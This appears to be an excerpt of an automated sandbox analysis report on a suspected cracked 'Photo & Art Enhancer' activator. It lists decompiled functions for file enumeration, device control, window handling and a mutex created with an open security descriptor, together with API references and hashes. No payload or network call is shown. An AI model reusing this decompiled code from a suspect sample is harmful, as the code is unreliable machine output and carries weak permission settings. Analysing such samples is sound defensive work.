				void* _t114;
				void* _t116;
				void* _t117;
				intOrPtr _t118;

				_t116 = _t117;
				_t118 = _t117 + 0xfffffea8;
				_push(__esi);
				_push(__edi);
				_v344 = 0;
				_v348 = 0;
				_v20 = 0;
				_t87 = __edx;
				_t114 = __eax;
				_push(_t116);
				_push(0x46528d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118;
				_v12 = SetErrorMode(1);
				_push(_t116);
				_push(0x465260);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118;
				if(E00403574(_t87) != 3) {
					L4:
					_v5 = 1;
					E0042C88C(_t87,  &_v344);
					E0040357C( &_v344, 0x4652a8);
					_v16 = FindFirstFileA(E00403738(_v344),  &_v340);
					if(_v16 == 0xffffffff) {
						_pop(_t101);
						 *[fs:eax] = _t101;
						_push(0x465267);
						return SetErrorMode(_v12);
					} else {
						_push(_t116);
						_push(0x465242);
						_push( *[fs:eax]);
						 *[fs:eax] = _t118;
						do {
							if(E00463AF8( &_v340) != 0) {
								E0040355C( &_v20, 0x104,  &(_v340.cFileName));
								E0042C88C(_t87,  &_v348);
								E0040357C( &_v348, _v20);
								E00463C38(_v348,  &_v344);
								E00464B50( *((intOrPtr*)(_a4 - 4)), _v20, _t114, 0, _v344);
							}
						} while (FindNextFileA(_v16,  &_v340) != 0);
						_pop(_t107);
						 *[fs:eax] = _t107;
						_push(0x465249);
						return FindClose(_v16);
					}
				} else {
					if(E00463F28(_t87, __edi, _t114) != 0) {
						E00463C38(_t87,  &_v344);
						E004654C8( *((intOrPtr*)(_a4 - 4)), _v344, _t114);
						goto L4;
					} else {
						_v5 = 0;
						E004031BC();
						_pop(_t110);
						 *[fs:eax] = _t110;
						_push(0x465294);
						E00403420( &_v348, 2);
						return E00403400( &_v20);
					}
				}
			}

0x004650d1
0x004650d3
0x004650da
0x004650db
0x004650de
0x004650e4
0x004650ea
0x004650ed
0x004650ef
0x004650f3
0x004650f4
0x004650f9
0x004650fc
0x00465106
0x0046510b
0x0046510c
0x00465111
0x00465114
0x00465121
0x0046515c
0x0046515c
0x0046516f
0x0046517f
0x00465195
0x0046519c
0x0046524b
0x0046524e
0x00465251
0x0046525f
0x004651a2
0x004651a4
0x004651a5
0x004651aa
0x004651ad
0x004651b0
0x004651bd
0x004651cd
0x004651da
0x004651e8
0x004651f9
0x00465212
0x00465212
0x00465227
0x0046522d
0x00465230
0x00465233
0x00465241
0x00465241
0x00465123
0x0046512c
0x00465144
0x00465157
0x00000000
0x0046512e
0x0046512e
0x00465132
0x00465269
0x0046526c
0x0046526f
0x0046527f
0x0046528c
0x0046528c
0x0046512c

APIs

SetErrorMode.KERNEL32(00000001,00000000,0046528D), ref: 00465101
FindFirstFileA.KERNEL32(00000000,?,00000000,00465260,?,00000001,00000000,0046528D), ref: 00465190
FindNextFileA.KERNEL32(000000FF,?,00000000,00465242,?,00000000,?,00000000,00465260,?,00000001,00000000,0046528D), ref: 00465222
FindClose.KERNEL32(000000FF,00465249,00465242,?,00000000,?,00000000,00465260,?,00000001,00000000,0046528D), ref: 0046523C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: 2fb1c301296fa1166147455f8f8ef7496ba139e6f88cfef0efaf9934acfaa298
Instruction ID: 440dca86ff91bcf92ec396117f9ee2e7eb4a9bd4f86bd55e8ffce81b2904001c
Opcode Fuzzy Hash: 2fb1c301296fa1166147455f8f8ef7496ba139e6f88cfef0efaf9934acfaa298
Instruction Fuzzy Hash: 6B41A230A04A589FDB10EF65DC55ADEB7B8EB89309F4044FAF404E7381E63C9E488E59

Uniqueness

Uniqueness Score: -1.00%

Function 0046554C Relevance: 7.6, APIs: 5, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0046554C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				int _v12;
				void* _v16;
				char _v20;
				struct _WIN32_FIND_DATAA _v340;
				char _v344;
				char _v348;
				void* _t55;
				void* _t90;
				intOrPtr _t102;
				intOrPtr _t105;
				void* _t113;
				void* _t116;
				void* _t118;
				void* _t120;
				void* _t121;
				intOrPtr _t122;

				_t91 = __ecx;
				_t120 = _t121;
				_t122 = _t121 + 0xfffffea8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v344 = 0;
				_v348 = 0;
				_v8 = 0;
				_v20 = 0;
				_t116 = __ecx;
				_t90 = __edx;
				_t118 = __eax;
				_push(_t120);
				_push(0x465733);
				_push( *[fs:eax]);
				 *[fs:eax] = _t122;
				_t123 = __ecx;
				if(__ecx != 0) {
					E0042CDE4(__ecx, __ecx,  &_v344);
					_push(_v344);
					E0042C88C(_t90,  &_v348);
					_pop(_t113);
					if(E0042CA98(_v348, _t90, _t91, _t113, _t116, _t118, _t123) == 0) {
						E0042CDBC(_t116, _t91,  &_v8);
					}
				}
				_v12 = SetErrorMode(1);
				_push(_t120);
				_push(0x4656fe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t122;
				E0042C88C(_t90,  &_v344);
				E0040357C( &_v344, 0x46574c);
				_v16 = FindFirstFileA(E00403738(_v344),  &_v340);
				if(_v16 == 0xffffffff) {
					__eflags = 0;
					_pop(_t102);
					 *[fs:eax] = _t102;
					_push(0x465705);
					return SetErrorMode(_v12);
				} else {
					_push(_t120);
					_push(0x4656e0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t122;
					do {
						_t55 = E00463AF8( &_v340);
						_t127 = _t55;
						if(_t55 != 0) {
							E0040355C( &_v20, 0x104,  &(_v340.cFileName));
							if(E0042CA98(_v20, _t90, 0x104, _v8, _t116, _t118, _t127) != 0 && E00464C38( *((intOrPtr*)(_a4 - 4)), _v20, _t118) == 0) {
								E0042C88C(_t90,  &_v348);
								E0040357C( &_v348, _v20);
								E00463C38(_v348,  &_v344);
								E00464B50( *((intOrPtr*)(_a4 - 4)), _v20, _t118, 0, _v344);
							}
						}
					} while (FindNextFileA(_v16,  &_v340) != 0);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x4656e7);
					return FindClose(_v16);
				}
			}

0x0046554c
0x0046554d
0x0046554f
0x00465555
0x00465556
0x00465557
0x0046555a
0x00465560
0x00465566
0x00465569
0x0046556c
0x0046556e
0x00465570
0x00465574
0x00465575
0x0046557a
0x0046557d
0x00465580
0x00465582
0x0046558c
0x00465597
0x004655a0
0x004655ab
0x004655b3
0x004655ba
0x004655ba
0x004655b3
0x004655c6
0x004655cb
0x004655cc
0x004655d1
0x004655d4
0x004655e6
0x004655f6
0x0046560c
0x00465613
0x004656e7
0x004656e9
0x004656ec
0x004656ef
0x004656fd
0x00465619
0x0046561b
0x0046561c
0x00465621
0x00465624
0x00465627
0x0046562d
0x00465632
0x00465634
0x00465644
0x00465656
0x00465674
0x00465682
0x00465693
0x004656ac
0x004656ac
0x00465656
0x004656c1
0x004656cb
0x004656ce
0x004656d1
0x004656df
0x004656df

APIs

SetErrorMode.KERNEL32(00000001,00000000,00465733), ref: 004655C1
FindFirstFileA.KERNEL32(00000000,?,00000000,004656FE,?,00000001,00000000,00465733), ref: 00465607
FindNextFileA.KERNEL32(000000FF,?,00000000,004656E0,?,00000000,?,00000000,004656FE,?,00000001,00000000,00465733), ref: 004656BC
FindClose.KERNEL32(000000FF,004656E7,004656E0,?,00000000,?,00000000,004656FE,?,00000001,00000000,00465733), ref: 004656DA

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: b90a0e96b7112793c089880cc0d83929c850bcc4406de3be7ff406baaa52c8e1
Instruction ID: 5fa7a0e481a84f03f33422116c22c7c15fd1db6c0b7bd2f560a0f02907c35907
Opcode Fuzzy Hash: b90a0e96b7112793c089880cc0d83929c850bcc4406de3be7ff406baaa52c8e1
Instruction Fuzzy Hash: 82417335A00A18DFCB10EFA5CC85ADEB7B9EB88305F4044AAF804E7341E6389E44CE59

Uniqueness

Uniqueness Score: -1.00%

Function 0042EDC4 Relevance: 7.6, APIs: 5, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0042EDC4(void* __eax, void* __ecx, void* __edx) {
				long _v16;
				signed int _t13;
				long _t16;
				signed int _t19;
				void* _t25;

				_t25 = CreateFileA(E00403738(__eax), 0xc0000000, 1, 0, 3, 0x2000000, 0);
				if(_t25 == 0xffffffff) {
					_t19 = 0;
				} else {
					_t13 = DeviceIoControl(_t25, 0x9c040, 0x49c790, 2, 0, 0,  &_v16, 0);
					asm("sbb eax, eax");
					_t19 =  ~( ~_t13);
					_t16 = GetLastError();
					CloseHandle(_t25);
					SetLastError(_t16);
				}
				return _t19;
			}

0x0042edeb
0x0042edf0
0x0042ee33
0x0042edf2
0x0042ee11
0x0042ee18
0x0042ee1c
0x0042ee1e
0x0042ee26
0x0042ee2c
0x0042ee2c
0x0042ee3b

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00453717,00000000,00453738), ref: 0042EDE6
DeviceIoControl.KERNEL32 ref: 0042EE11
GetLastError.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000), ref: 0042EE1E
CloseHandle.KERNEL32(00000000,00000000,0009C040,?,00000002,00000000,00000000,?,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000), ref: 0042EE26
SetLastError.KERNEL32(00000000,00000000,00000000,0009C040,?,00000002,00000000,00000000,?,00000000,00000000,C0000000,00000001,00000000,00000003,02000000), ref: 0042EE2C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast$CloseControlCreateDeviceFileHandle
String ID:
API String ID: 1177325624-0
Opcode ID: be7acdfe5edbba34b858ce3ca365b130364ae6d53b31bd94e4eebd6c3b9b2d57
Instruction ID: 70587ef730fcdfb329c4590a56e67438f12b0fd4b2c9556a93668e86dd7922da
Opcode Fuzzy Hash: be7acdfe5edbba34b858ce3ca365b130364ae6d53b31bd94e4eebd6c3b9b2d57
Instruction Fuzzy Hash: 9CF090723917203AF620B17AAC86F7F428CCB89B68F50423AF714FF1D1D9A85D0955AD

Uniqueness

Uniqueness Score: -1.00%

Function 00485CFC Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00485CFC(signed int __eax) {
				signed int _t8;
				intOrPtr _t9;
				intOrPtr _t10;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t21;
				signed int _t24;
				void* _t25;

				_t8 = __eax;
				_t24 = __eax;
				if( *0x49f0ac != 0) {
					_t9 =  *0x49f0ac; // 0x31f4d88
					_t8 = E00418808(_t9);
					if(_t8 != 0) {
						_t10 =  *0x49f0ac; // 0x31f4d88
						if( *((char*)(_t10 + 0xc7)) == 0 ||  *((char*)(_t24 + 0x1b9)) != 0) {
							L5:
							_t11 = 0;
						} else {
							_t21 =  *0x49e62c; // 0x2252410
							if(IsIconic( *(_t21 + 0x20)) == 0) {
								_t11 = 1;
							} else {
								goto L5;
							}
						}
						_t25 = _t11;
						_t12 =  *0x49f0ac; // 0x31f4d88
						_t8 = GetWindowLongA(E00418670(_t12), 0xfffffff0) & 0xffffff00 | (_t14 & 0x10000000) != 0x00000000;
						if(_t25 != _t8) {
							if(_t25 == 0) {
								_t15 =  *0x49f0ac; // 0x31f4d88
								return ShowWindow(E00418670(_t15), 0);
							}
							_t18 =  *0x49f0ac; // 0x31f4d88
							return ShowWindow(E00418670(_t18), 5);
						}
					}
				}
				return _t8;
			}

0x00485cfc
0x00485cfd
0x00485d06
0x00485d0c
0x00485d11
0x00485d18
0x00485d1a
0x00485d26
0x00485d43
0x00485d43
0x00485d31
0x00485d31
0x00485d41
0x00485d47
0x00000000
0x00000000
0x00000000
0x00485d41
0x00485d49
0x00485d4d
0x00485d62
0x00485d67
0x00485d6b
0x00485d83
0x00000000
0x00485d8e
0x00485d6f
0x00000000
0x00485d7a
0x00485d67
0x00485d18
0x00485d94

APIs

IsIconic.USER32 ref: 00485D3A
GetWindowLongA.USER32 ref: 00485D58
ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049F0AC,00485216,0048524A,00000000,0048526A,?,?,?,0049F0AC), ref: 00485D7A
ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049F0AC,00485216,0048524A,00000000,0048526A,?,?,?,0049F0AC), ref: 00485D8E

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$Show$IconicLong
String ID:
API String ID: 2754861897-0
Opcode ID: 4c308d3b12315672c07ac890770fdfbe74c8bd42f6d9c93706204eed776ff039
Instruction ID: 5af26d4b23032c42014cdd6a7ba96e1f526e5740e281828ed4b475e411d83285
Opcode Fuzzy Hash: 4c308d3b12315672c07ac890770fdfbe74c8bd42f6d9c93706204eed776ff039
Instruction Fuzzy Hash: 60011A716056409AEB10BB7A9C4DB5A33DD5B14304F19887BBC00DF2A3CA6DDC859B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00463B44 Relevance: 4.6, APIs: 3, Instructions: 67
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00463B44(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v5;
				void* _v12;
				struct _WIN32_FIND_DATAA _v332;
				char _v336;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t52;
				void* _t53;
				intOrPtr _t54;

				_t52 = _t53;
				_t54 = _t53 + 0xfffffeb4;
				_v336 = 0;
				_push(_t52);
				_push(0x463c18);
				_push( *[fs:eax]);
				 *[fs:eax] = _t54;
				_v5 = 0;
				E0042C88C(__eax,  &_v336);
				E0040357C( &_v336, 0x463c34);
				_v12 = FindFirstFileA(E00403738(_v336),  &_v332);
				if(_v12 == 0xffffffff) {
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x463c1f);
					return E00403400( &_v336);
				} else {
					_push(_t52);
					_push(0x463bf8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t54;
					while(E00463AF8( &_v332) == 0) {
						if(FindNextFileA(_v12,  &_v332) != 0) {
							continue;
						}
						L5:
						_pop(_t48);
						 *[fs:eax] = _t48;
						_push(0x463bff);
						return FindClose(_v12);
						goto L7;
					}
					_v5 = 1;
					goto L5;
				}
				L7:
			}

0x00463b45
0x00463b47
0x00463b52
0x00463b5c
0x00463b5d
0x00463b62
0x00463b65
0x00463b68
0x00463b7b
0x00463b8b
0x00463ba1
0x00463ba8
0x00463c01
0x00463c04
0x00463c07
0x00463c17
0x00463baa
0x00463bac
0x00463bad
0x00463bb2
0x00463bb5
0x00463bb8
0x00463bdf
0x00000000
0x00000000
0x00463be1
0x00463be3
0x00463be6
0x00463be9
0x00463bf7
0x00000000
0x00463bf7
0x00463bc7
0x00000000
0x00463bc7
0x00000000

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00463C18), ref: 00463B9C
FindNextFileA.KERNEL32(000000FF,?,00000000,00463BF8,?,00000000,?,00000000,00463C18), ref: 00463BD8
FindClose.KERNEL32(000000FF,00463BFF,00463BF8,?,00000000,?,00000000,00463C18), ref: 00463BF2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: cfb19cbf58148f20a8eb11bc863b9ba51049412b42bc76eb3cd84f5252a39ad4
Instruction ID: a0cce92d96e660be0b97b7f28cec8121132c3377f259b36877ec83f4fdc062c8
Opcode Fuzzy Hash: cfb19cbf58148f20a8eb11bc863b9ba51049412b42bc76eb3cd84f5252a39ad4
Instruction Fuzzy Hash: 4C21D8315046886EDB11DF66CC41ADEBBACDB49705F5084FBF808E3661E638DF44CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042466C Relevance: 4.5, APIs: 3, Instructions: 32
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042466C(void* __eax) {
				struct HWND__* _t10;
				void* _t21;

				_t21 = __eax;
				_t10 = IsIconic( *(__eax + 0x20));
				_t25 = _t10;
				if(_t10 != 0) {
					SetActiveWindow( *(_t21 + 0x20));
					E00423ADC( *(_t21 + 0x20), 9, _t25);
					E00423FA4(_t21);
					_t10 =  *0x49e630; // 0x2250660
					_t24 =  *((intOrPtr*)(_t10 + 0x3c));
					if( *((intOrPtr*)(_t10 + 0x3c)) != 0) {
						_t10 = SetFocus(E00418670(_t24));
					}
					if( *((short*)(_t21 + 0xd6)) != 0) {
						return  *((intOrPtr*)(_t21 + 0xd4))();
					}
				}
				return _t10;
			}

0x0042466e
0x00424674
0x00424679
0x0042467b
0x00424681
0x0042468e
0x00424695
0x0042469a
0x0042469f
0x004246a4
0x004246ae
0x004246ae
0x004246bb
0x00000000
0x004246c5
0x004246bb
0x004246cd

APIs

IsIconic.USER32 ref: 00424674
SetActiveWindow.USER32(?,?,?,?,0046E2FF), ref: 00424681

Part of subcall function 00423ADC: ShowWindow.USER32(004108F0,00000009,?,00000000,0041F234,00423DCA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00423AF7

Part of subcall function 00423FA4: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,02252410,0042469A,?,?,?,?,0046E2FF), ref: 00423FDF

SetFocus.USER32(00000000,?,?,?,?,0046E2FF), ref: 004246AE

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$ActiveFocusIconicShow
String ID:
API String ID: 649377781-0
Opcode ID: 6fb5541612255947ef2c91b9d7674ffacd1557a8c948e8d6abd3677b7be11a69
Instruction ID: 41fac251e040b5459bea7d3bbf68ddb82a9bf8d4fdffabeb223ec960e46dc8d5
Opcode Fuzzy Hash: 6fb5541612255947ef2c91b9d7674ffacd1557a8c948e8d6abd3677b7be11a69
Instruction Fuzzy Hash: FCF0D0717001108BDB40FFAAE9C5B9632A4AF49704B55057BBC05DF35BC67CDC458768

Uniqueness

Uniqueness Score: -1.00%

Function 0042F294 Relevance: 4.5, APIs: 3, Instructions: 28
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042F294(void* __eax) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				void* _t18;
				intOrPtr _t19;

				_t18 = __eax;
				InitializeSecurityDescriptor( &_v36, 1);
				SetSecurityDescriptorDacl( &_v36, 1, 0, 0);
				_v16.nLength = 0xc;
				_v16.lpSecurityDescriptor = _t19;
				_v16.bInheritHandle = 0;
				return CreateMutexA( &_v16, 0, E00403738(_t18));
			}

0x0042f298
0x0042f2a1
0x0042f2b1
0x0042f2b6
0x0042f2c0
0x0042f2c6
0x0042f2e2

APIs

InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 0042F2A1
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000001), ref: 0042F2B1
CreateMutexA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042F2D9

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: DescriptorSecurity$CreateDaclInitializeMutex
String ID:
API String ID: 3525989157-0
Opcode ID: 2c808e9d1d2103421bc27e7a9199af7a8a7f53dda2cfff6e3100d803d15f4299
Instruction ID: b330794617a7040f76ad0da05c7b1ee5a1856395dd3e8d048ce20caf316d4231
Opcode Fuzzy Hash: 2c808e9d1d2103421bc27e7a9199af7a8a7f53dda2cfff6e3100d803d15f4299
Instruction Fuzzy Hash: 18E0C0B16443007EE200EE758C82F5F76DCDB48714F00483AB654DB1C1E679D9489B96

Uniqueness

Uniqueness Score: -1.00%

Function 0041815E Relevance: 3.0, APIs: 2, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041815E(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void _v64;
				int _t34;
				void* _t52;
				int _t60;
				int _t66;

				_t60 = __ecx;
				_t66 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x24)) || __ecx !=  *((intOrPtr*)(__eax + 0x28)) || _a8 !=  *((intOrPtr*)(__eax + 0x2c))) {
					L5:
					if(E00418808(_t52) == 0 || IsIconic( *(_t52 + 0xc0)) != 0) {
						 *(_t52 + 0x24) = _t66;
						 *(_t52 + 0x28) = _t60;
						 *((intOrPtr*)(_t52 + 0x2c)) = _a8;
						 *((intOrPtr*)(_t52 + 0x30)) = _a4;
						if(E00418808(_t52) != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0xc0),  &_v48);
							E00414AEC(_t52,  &_v64);
							memcpy( &(_v48.rcNormalPosition),  &_v64, 4 << 2);
							SetWindowPlacement( *(_t52 + 0xc0),  &_v48);
						}
					} else {
						SetWindowPos( *(_t52 + 0xc0), 0, _t66, _t60, _a8, _a4, 0x14);
					}
					_t34 = E004148F0(_t52);
				} else {
					_t34 = _a4;
					if(_t34 !=  *((intOrPtr*)(__eax + 0x30))) {
						goto L5;
					}
				}
				return _t34;
			}

0x00418169
0x0041816b
0x0041816d
0x00418172
0x0041818d
0x00418196
0x004181c4
0x004181c7
0x004181cd
0x004181d3
0x004181df
0x004181e1
0x004181f3
0x004181fd
0x0041820d
0x0041821a
0x0041821a
0x004181a8
0x004181bd
0x004181bd
0x00418221
0x00418181
0x00418181
0x00418187
0x00000000
0x00000000
0x00418187
0x0041822c

APIs

IsIconic.USER32 ref: 0041819F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 004181BD
GetWindowPlacement.USER32(?,0000002C), ref: 004181F3
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0041821A

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID:
API String ID: 568898626-0
Opcode ID: 93123499588309d436321f36bfa17b4aada1e27efe65d07a76ab247a868ec15b
Instruction ID: c40958ec65a3081d6570449c7fa77bc67a6f73258cf3a653cafff2f251148837
Opcode Fuzzy Hash: 93123499588309d436321f36bfa17b4aada1e27efe65d07a76ab247a868ec15b
Instruction Fuzzy Hash: DE018F72240204BBDF10EE69DCC1EEB3398AB55364F15416AFD08DF242DA38EC8187A8

Uniqueness

Uniqueness Score: -1.00%

Function 00453238 Relevance: 3.0, APIs: 2, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00453238(void* __eax, struct _WIN32_FIND_DATAA* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v16;
				long _v20;
				intOrPtr _t27;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t35 = _t37;
				_t38 = _t37 + 0xfffffff0;
				if(E00452EFC(__eax,  &_v16) != 0) {
					_push(_t35);
					_push(0x45329b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t38;
					_v8 = FindFirstFileA(E00403738(__edx), __ecx);
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004532A2);
					return E00452F38( &_v16);
				} else {
					_v8 = 0xffffffff;
					return _v8;
				}
			}

0x00453239
0x0045323b
0x00453253
0x00453260
0x00453261
0x00453266
0x00453269
0x0045327a
0x00453282
0x00453287
0x0045328a
0x0045328d
0x0045329a
0x00453255
0x00453255
0x004532b4
0x004532b4

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0045329B,?,?,-00000001,00000000), ref: 00453275
GetLastError.KERNEL32(00000000,?,00000000,0045329B,?,?,-00000001,00000000), ref: 0045327D

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
